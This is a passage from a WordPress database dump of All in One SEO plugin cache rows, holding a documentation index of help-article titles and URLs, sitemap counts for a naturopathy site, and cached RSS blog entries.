SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-remove-all-settings-and-data-when-you-uninstall-all-in-one-seo\\/\",\"categories\":[\"advanced-settings\",\"general-settings\"]},\"18800\":{\"title\":\"How to Disable TruSEO Content Analysis\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-disable-truseo-content-analysis\\/\",\"categories\":[\"advanced-settings\",\"general-settings\",\"truseo\"]},\"18801\":{\"title\":\"Enabling Automatic Updates for All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/enabling-automatic-updates-for-all-in-one-seo\\/\",\"categories\":[\"advanced-settings\",\"general-settings\"]},\"18802\":{\"title\":\"Hiding Plugin Notifications in the Notifications Center\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/hiding-plugin-notifications-in-the-notifications-center\\/\",\"categories\":[\"advanced-settings\",\"general-settings\"]},\"18803\":{\"title\":\"How to Hide the AIOSEO Settings on the Edit Content Screens in WordPress\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-hide-the-aioseo-settings-on-the-edit-content-screens-in-wordpress\\/\",\"categories\":[\"advanced-settings\",\"content-type-settings\",\"post-page-settings\",\"search-appearance\"]},\"18804\":{\"title\":\"Setting Noindex and Nofollow on Paginated Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-noindex-and-nofollow-on-paginated-content\\/\",\"categories\":[\"advanced-settings\",\"search-appearance\"]},\"18805\":{\"title\":\"Setting Unique SEO Titles and Descriptions for Paginated Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-unique-seo-titles-and-descriptions-for-paginated-content\\/\",\"categories\":[\"advanced-settings\",\"search-appearance\"]},\"18806\":{\"title\":\"Setting the SEO Title and Description Format for Custom Post Type Archives\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-custom-post-type-archives\\/\",\"categories\":[\"archive-settings\",\"search-appearance\"]},\"18807\":{\"title\":\"Meta Keyword Settings in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/keyword-settings\\/\",\"categories\":[\"advanced-settings\",\"search-appearance\"]},\"18808\":{\"title\":\"Using the Quick Edit Feature in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-quick-edit-feature-in-all-in-one-seo\\/\",\"categories\":[\"post-page-settings\"]},\"18809\":{\"title\":\"How to FTP to your web server\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-ftp-to-your-web-server\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18810\":{\"title\":\"How to manually install All in One SEO Pro when the file is too big\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-manually-install-all-in-one-seo-pro-when-the-file-is-too-big\\/\",\"categories\":[\"frequently-asked-questions\",\"installation\"]},\"18811\":{\"title\":\"How to Upgrade From All in One SEO Lite to Pro\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-upgrade-from-all-in-one-seo-lite-to-pro\\/\",\"categories\":[\"getting-started\",\"installation\"]},\"18812\":{\"title\":\"Installation instructions for WordPress.com Users\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/installation-instructions-for-wordpress-com-users\\/\",\"categories\":[\"installation\"]},\"18814\":{\"title\":\"Configuring the Twitter Settings for Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/configuring-the-twitter-settings-for-your-content\\/\",\"categories\":[\"post-page-settings\",\"social-networks\",\"twitter-settings\"]},\"18815\":{\"title\":\"Configuring the Facebook Settings for Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/configuring-the-facebook-settings-for-your-content\\/\",\"categories\":[\"facebook-settings\",\"post-page-settings\",\"social-networks\"]},\"18816\":{\"title\":\"Hiding the AIOSEO Column on Taxonomy Screens\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/hiding-the-aioseo-column-on-taxonomy-screens\\/\",\"categories\":[\"advanced-settings\",\"category-tag-settings\",\"general-settings\"]},\"18818\":{\"title\":\"Setting the Sitemap Priority and Frequency for Individual Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-sitemap-priority-and-frequency-for-individual-content\\/\",\"categories\":[\"post-page-settings\",\"xml-sitemap\"]},\"18819\":{\"title\":\"Setting the Robots Meta for Individual Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-robots-meta-for-individual-content\\/\",\"categories\":[\"post-page-settings\"]},\"18823\":{\"title\":\"How to Fix a 404 Error When Viewing Your Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-fix-a-404-error-when-viewing-your-sitemap\\/\",\"categories\":[\"frequently-asked-questions\",\"google-news-sitemap\",\"rss-sitemap\",\"troubleshooting\",\"video-sitemap\",\"xml-sitemap\"]},\"18825\":{\"title\":\"When to use NOINDEX or the robots.txt?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/when-to-use-noindex-or-the-robots-txt\\/\",\"categories\":[\"frequently-asked-questions\",\"robots-txt\",\"search-appearance\",\"tools\"]},\"18826\":{\"title\":\"Support for Videos Embedded Using the Media Library\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/support-for-videos-embedded-using-the-media-library\\/\",\"categories\":[\"video-sitemap\"]},\"18827\":{\"title\":\"Supported Videos\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/supported-videos\\/\",\"categories\":[\"video-sitemap\"]},\"18830\":{\"title\":\"Setting the SEO Title and Description Format for Author and Date Archives\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-author-and-date-archives\\/\",\"categories\":[\"archive-settings\",\"search-appearance\"]},\"18831\":{\"title\":\"Using Custom Fields in Titles and Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/custom-fields-in-titles-and-descriptions\\/\",\"categories\":[\"content-type-settings\",\"post-page-settings\",\"search-appearance\"]},\"18832\":{\"title\":\"Using the Focus Keyword to Analyze Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-focus-keyphrase-to-analyze-your-content\\/\",\"categories\":[\"frequently-asked-questions\",\"post-page-settings\",\"truseo\"]},\"18833\":{\"title\":\"Using the Robots.txt Tool in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-robots-txt-tool-in-all-in-one-seo\\/\",\"categories\":[\"robots-txt\",\"tools\"]},\"18834\":{\"title\":\"Using the Robots Meta Settings in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-robots-meta-settings-in-all-in-one-seo\\/\",\"categories\":[\"advanced-settings\",\"archive-settings\",\"category-tag-settings\",\"content-type-settings\",\"media-settings\",\"post-page-settings\",\"search-appearance\",\"taxonomy-settings\"]},\"18838\":{\"title\":\"Hiding the AIOSEO Admin Bar Menu\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/hiding-the-aioseo-admin-bar-menu\\/\",\"categories\":[\"advanced-settings\",\"general-settings\"]},\"18839\":{\"title\":\"Hiding the AIOSEO Dashboard Widgets\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/hiding-the-aioseo-dashboard-widget\\/\",\"categories\":[\"advanced-settings\",\"general-settings\"]},\"18840\":{\"title\":\"Hiding the AIOSEO Column on All Posts Screens\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/hiding-the-aioseo-column-on-all-posts-screens\\/\",\"categories\":[\"advanced-settings\",\"general-settings\"]},\"18842\":{\"title\":\"Setting the SEO Title and Description Format for Media Attachments\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-media-attachments\\/\",\"categories\":[\"media-settings\",\"search-appearance\"]},\"18843\":{\"title\":\"Showing or Hiding Your Content in Search Results\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/showing-or-hiding-your-content-in-search-results\\/\",\"categories\":[\"archive-settings\",\"category-tag-settings\",\"content-type-settings\",\"media-settings\",\"post-page-settings\",\"search-appearance\",\"taxonomy-settings\"]},\"18845\":{\"title\":\"What Are Media Attachments and Should I Submit Them to Search Engines?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-are-media-attachments-and-should-i-submit-them-to-search-engines\\/\",\"categories\":[\"frequently-asked-questions\",\"media-settings\"]},\"18846\":{\"title\":\"Setting the SEO Title and Description Format for Custom Taxonomies\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-custom-taxonomies\\/\",\"categories\":[\"category-tag-settings\",\"search-appearance\",\"taxonomy-settings\"]},\"18847\":{\"title\":\"Setting the SEO Title and Description Format for Custom Post Types\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-custom-post-types\\/\",\"categories\":[\"content-type-settings\",\"search-appearance\"]},\"18848\":{\"title\":\"Setting the SEO Title and Description Format for Tags\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-tags\\/\",\"categories\":[\"category-tag-settings\",\"search-appearance\",\"taxonomy-settings\"]},\"18849\":{\"title\":\"Setting the SEO Title and Description Format for Categories\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-categories\\/\",\"categories\":[\"category-tag-settings\",\"search-appearance\",\"taxonomy-settings\"]},\"18850\":{\"title\":\"Setting the SEO Title and Description Format for Pages\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-pages\\/\",\"categories\":[\"content-type-settings\",\"post-page-settings\",\"search-appearance\"]},\"18851\":{\"title\":\"Setting the SEO Title and Description Format for Posts\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-posts\\/\",\"categories\":[\"content-type-settings\",\"post-page-settings\",\"search-appearance\"]},\"18853\":{\"title\":\"Setting the SEO for Your Home Page\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-for-your-home-page\\/\",\"categories\":[\"home-page-settings\",\"search-appearance\"]},\"18855\":{\"title\":\"How to Add Your License Key for All in One SEO Pro\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-add-your-license-key-in-all-in-one-seo-pro\\/\",\"categories\":[\"general-settings\",\"getting-started\"]},\"18856\":{\"title\":\"Canonical URLs in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/canonical-urls-in-all-in-one-seo\\/\",\"categories\":[\"advanced-settings\",\"search-appearance\"]},\"18858\":{\"title\":\"Adding non-WordPress Content to the Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-non-wordpress-content-to-the-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18860\":{\"title\":\"Troubleshooting Problems With Sharing Content on Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/troubleshooting-problems-with-sharing-content-on-twitter\\/\",\"categories\":[\"social-networks\",\"troubleshooting\",\"twitter-settings\"]},\"18861\":{\"title\":\"Troubleshooting Problems With Sharing Content on Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/troubleshooting-problems-with-sharing-content-on-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\",\"troubleshooting\"]},\"18862\":{\"title\":\"Getting Started With Pinterest Rich Pins\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-social-meta-for-pinterest-rich-pins\\/\",\"categories\":[\"pinterest-settings\",\"social-networks\"]},\"18863\":{\"title\":\"Setting the Content Publisher for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-publisher-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18865\":{\"title\":\"Submitting a Sitemap to Yandex\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/submitting-a-sitemap-to-yandex\\/\",\"categories\":[\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18866\":{\"title\":\"Submitting a Sitemap to Bing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/submitting-a-sitemap-to-bing\\/\",\"categories\":[\"bing-webmaster-tools\",\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18867\":{\"title\":\"Submitting a Sitemap to Google\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/submitting-a-sitemap-to-google\\/\",\"categories\":[\"google-news-sitemap\",\"google-search-console\",\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18868\":{\"title\":\"Including Date and Author Archives in Your XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/including-date-and-author-archives-in-your-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18869\":{\"title\":\"Choosing Which Content to Include in Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/choosing-which-content-to-include-in-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18870\":{\"title\":\"Choosing Which Content to Include in Your XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/choosing-which-content-to-include-in-your-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18871\":{\"title\":\"Using Sitemap Indexes and Pagination\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-sitemap-indexes-and-pagination\\/\",\"categories\":[\"video-sitemap\",\"xml-sitemap\"]},\"18872\":{\"title\":\"How to Disable Sitemaps in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-disable-sitemaps-in-all-in-one-seo\\/\",\"categories\":[\"google-news-sitemap\",\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18873\":{\"title\":\"Baidu Webmaster Tools Verification\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/baidu-webmaster-tools-verification\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18874\":{\"title\":\"Setting Twitter Social Meta for Your Homepage\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-twitter-social-meta-for-your-homepage\\/\",\"categories\":[\"home-page-settings\",\"social-networks\",\"twitter-settings\"]},\"18875\":{\"title\":\"Setting Facebook Social Meta for Your Homepage\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-facebook-social-meta-for-your-homepage\\/\",\"categories\":[\"facebook-settings\",\"home-page-settings\",\"social-networks\"]},\"18876\":{\"title\":\"Setting the Card Type for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-card-type-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18877\":{\"title\":\"Setting the Object Types for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-object-types-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18879\":{\"title\":\"Setting the Priority and Frequency for Content in the Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-priority-and-frequency-for-content-in-the-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18880\":{\"title\":\"Setting the Priority and Frequency for Content in the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-priority-and-frequency-for-content-in-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18881\":{\"title\":\"How to Exclude Content from Your RSS Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-rss-sitemap\\/\",\"categories\":[\"rss-sitemap\"]},\"18882\":{\"title\":\"How to Exclude Content from Your Google News Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-google-news-sitemap\\/\",\"categories\":[\"google-news-sitemap\"]},\"18883\":{\"title\":\"How to Exclude Content from Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18884\":{\"title\":\"How to Exclude Content from Your XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18885\":{\"title\":\"Setting Article Tags for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-article-tags-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18886\":{\"title\":\"Setting the Content Author for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-author-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18887\":{\"title\":\"Setting the Content Author for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-author-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18888\":{\"title\":\"Setting the Content Publisher for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-publisher-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18889\":{\"title\":\"How to Create a Google News Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-a-google-news-sitemap\\/\",\"categories\":[\"google-news-sitemap\"]},\"18890\":{\"title\":\"Including Videos in Custom Fields in Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/including-videos-in-custom-fields-in-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18891\":{\"title\":\"What is a Dynamically Generated Sitemap and Why is it Better to Use?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-a-dynamically-generated-sitemap-and-why-is-it-better-to-use\\/\",\"categories\":[\"frequently-asked-questions\",\"video-sitemap\",\"xml-sitemap\"]},\"18892\":{\"title\":\"How to Create a Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-a-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18893\":{\"title\":\"Adding Your Facebook Admin ID\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-your-facebook-admin-id\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18894\":{\"title\":\"Adding Your Facebook App ID\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-your-facebook-app-id\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18895\":{\"title\":\"Access Control Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/access-control-settings\\/\",\"categories\":[\"access-control-settings\"]},\"18897\":{\"title\":\"Miscellaneous Site Verification\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/miscellaneous-site-verification\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18898\":{\"title\":\"Displaying Your Social Media Profiles in Knowledge Panel\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-your-social-media-profiles-in-knowledge-panel\\/\",\"categories\":[\"schema-settings\",\"social-networks\"]},\"18899\":{\"title\":\"How to Create an RSS Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-an-rss-sitemap\\/\",\"categories\":[\"rss-sitemap\"]},\"18900\":{\"title\":\"Excluding Images from the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/excluding-images-from-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18901\":{\"title\":\"Adding non-WordPress Content to the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-non-wordpress-content-to-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18903\":{\"title\":\"Setting a Default Image for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-default-image-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18904\":{\"title\":\"Setting a Default Image for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-default-image-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18905\":{\"title\":\"Setting a Title Separator\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-title-separator\\/\",\"categories\":[\"search-appearance\"]},\"18906\":{\"title\":\"How to Protect Your Content With RSS Content Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-protect-your-content-with-rss-content-settings\\/\",\"categories\":[\"rss-content-settings\"]},\"18907\":{\"title\":\"How to Connect Your Site with Google Tag Manager\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-connect-your-site-with-google-tag-manager\\/\",\"categories\":[\"google-analytics\"]},\"18908\":{\"title\":\"How to Connect Your Site with Google Analytics\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-connect-your-site-with-google-analytics\\/\",\"categories\":[\"google-analytics\"]},\"18909\":{\"title\":\"How to Verify Your Site with Pinterest\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-pinterest\\/\",\"categories\":[\"pinterest-settings\",\"social-networks\",\"webmaster-tools\",\"webmaster-verification\"]},\"18910\":{\"title\":\"How to Verify Your Site with Yandex Webmaster Tools\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-yandex-webmaster-tools\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18911\":{\"title\":\"How to Verify Your Site with Bing Webmaster Tools\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-bing-webmaster-tools\\/\",\"categories\":[\"bing-webmaster-tools\",\"webmaster-tools\",\"webmaster-verification\"]},\"18912\":{\"title\":\"How to Verify Your Site with Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-google-search-console\\/\",\"categories\":[\"google-search-console\",\"webmaster-tools\",\"webmaster-verification\"]},\"18913\":{\"title\":\"Usage Tracking\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/usage-tracking\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18915\":{\"title\":\"How do I use All in One SEO in my language?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-use-all-in-one-seo-in-my-language\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18920\":{\"title\":\"NGINX rewrite rules for Robots.txt\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/nginx-rewrite-rules-for-robots-txt\\/\",\"categories\":[\"robots-txt\",\"tools\"]},\"18927\":{\"title\":\"Supported PHP Versions for All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/supported-php-version\\/\",\"categories\":[\"troubleshooting\"]},\"18929\":{\"title\":\"Using a different CDN for script enqueuing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-a-different-cdn-for-script-enqueuing\\/\",\"categories\":[\"troubleshooting\"]},\"18930\":{\"title\":\"How do I get Google to show sitelinks for my site?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-get-google-to-show-sitelinks-for-my-site\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18954\":{\"title\":\"How does the import process for SEO data work?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-does-the-import-process-for-seo-data-work\\/\",\"categories\":[\"frequently-asked-questions\",\"importer-exporter\",\"tools\"]},\"18960\":{\"title\":\"Robots.txt Editor for Multisite Networks\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/robots-txt-editor-for-multisite-networks\\/\",\"categories\":[\"multisite-networks\",\"robots-txt\"]},\"18961\":{\"title\":\"What are the minimum requirements for All in One SEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-are-the-minimum-requirements-for-all-in-one-seo-pack\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18964\":{\"title\":\"How do I use your API code examples?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-use-your-api-code-examples\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18969\":{\"title\":\"XML Parsing Error - This page contains the following errors\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/this-page-contains-the-following-errors\\/\",\"categories\":[\"google-news-sitemap\",\"troubleshooting\",\"video-sitemap\",\"xml-sitemap\"]},\"18977\":{\"title\":\"Excluding the XML Sitemap from caching\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/excluding-the-xml-sitemap-from-caching\\/\",\"categories\":[\"xml-sitemap\"]},\"18982\":{\"title\":\"Why doesn\'t the title and description I set appear in search results?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/why-doesnt-the-title-and-description-i-set-appear-in-search-results\\/\",\"categories\":[\"frequently-asked-questions\",\"post-page-settings\"]},\"18983\":{\"title\":\"Can I remove the date from Google search results?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-remove-the-date-from-google-search-results\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18985\":{\"title\":\"Setting up HTTPS SSL\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-up-https-ssl\\/\",\"categories\":[\"general-seo-topics\"]},\"18995\":{\"title\":\"How to Increase the WordPress PHP Memory Limit\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/increase-wordpress-php-memory-limit\\/\",\"categories\":[\"troubleshooting\"]},\"19002\":{\"title\":\"Checking Index Status in Google Search Results\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/checking-index-status-in-google-search-results\\/\",\"categories\":[\"general-seo-topics\"]},\"19008\":{\"title\":\"How to troubleshoot issues with All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-troubleshoot-issues-with-all-in-one-seo-pack\\/\",\"categories\":[\"troubleshooting\"]},\"19010\":{\"title\":\"Quality Guidelines for SEO Titles and Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/quality-guidelines-for-seo-titles-and-descriptions\\/\",\"categories\":[\"general-seo-topics\"]},\"19016\":{\"title\":\"Top Tips for Good On-Page SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/top-tips-for-good-on-page-seo\\/\",\"categories\":[\"general-seo-topics\"]},\"19017\":{\"title\":\"Meta Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/meta-descriptions\\/\",\"categories\":[\"general-seo-topics\"]},\"19028\":{\"title\":\"What is SEO meta?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-seo-meta\\/\",\"categories\":[\"getting-started\"]},\"19034\":{\"title\":\"Feature Manager\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/feature-manager\\/\",\"categories\":[\"feature-manager\"]}}}\";','2026-05-25 05:34:35','2026-05-18 05:34:35','2026-05-18 05:34:35'),(361,'aioseo_sitemap_sitemap.xml.gz','a:3:{s:6:\"counts\";a:5:{s:48:\"https://verdenaturopathy.com.au/page-sitemap.xml\";i:8;s:56:\"https://verdenaturopathy.com.au/post-archive-sitemap.xml\";i:1;s:55:\"https://verdenaturopathy.com.au/layout_type-sitemap.xml\";i:1;s:49:\"https://verdenaturopathy.com.au/scope-sitemap.xml\";i:2;s:56:\"https://verdenaturopathy.com.au/module_width-sitemap.xml\";i:1;}s:8:\"datetime\";a:4:{s:48:\"https://verdenaturopathy.com.au/page-sitemap.xml\";a:2:{s:4:\"date\";s:17:\"February 19, 2026\";s:4:\"time\";s:7:\"1:18 pm\";}s:55:\"https://verdenaturopathy.com.au/layout_type-sitemap.xml\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}s:49:\"https://verdenaturopathy.com.au/scope-sitemap.xml\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}s:56:\"https://verdenaturopathy.com.au/module_width-sitemap.xml\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:5;s:5:\"total\";i:5;}}','2026-06-08 15:09:04','2025-12-16 22:14:53','2026-05-09 15:09:04'),(425,'rss_feed','a:3:{i:0;a:4:{s:3:\"url\";s:92:\"https://aioseo.com/seo-advice/?utm_source=rss&utm_medium=rss&utm_campaign=seo-advice\";s:5:\"title\";s:57:\"The Honest SEO Advice I’d Give Any Small Business Owner\";s:4:\"date\";s:12:\"May 19, 2026\";s:7:\"content\";s:131:\"If you\'ve ever Googled “how to improve SEO” and walked away more confused than when you started, welcome to the club...\";}i:1;a:4:{s:3:\"url\";s:172:\"https://aioseo.com/how-to-easily-find-and-fix-404-errors-in-wordpress/?utm_source=rss&utm_medium=rss&utm_campaign=how-to-easily-find-and-fix-404-errors-in-wordpress\";s:5:\"title\";s:50:\"How to Easily Find and Fix 404 Errors in WordPress\";s:4:\"date\";s:12:\"May 15, 2026\";s:7:\"content\";s:131:\"Do you have a lot of 404 errors on your WordPress site and are not sure how to fix them?\n\n\n\nHere\'s the thing: broken links and m...\";}i:2;a:4:{s:3:\"url\";s:110:\"https://aioseo.com/content-pruning-seo/?utm_source=rss&utm_medium=rss&utm_campaign=content-pruning-seo\";s:5:\"title\";s:55:\"Content Pruning: The Powerful SEO Fix Most Sites Ignore\";s:4:\"date\";s:12:\"May 12, 2026\";s:7:\"content\";s:131:\"You\'ve been publishing blog posts for months, but your organic traffic has flatlined. Or worse, it\'s dropping.\n\n\n\nIf your site i...\";}}','2026-05-20 17:14:42','2026-05-20 05:14:42','2026-05-20 05:14:42'),(426,'post_overview_data','a:5:{s:5:\"total\";i:0;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:0;}','2026-05-27 05:14:42','2026-05-20 05:14:42','2026-05-20 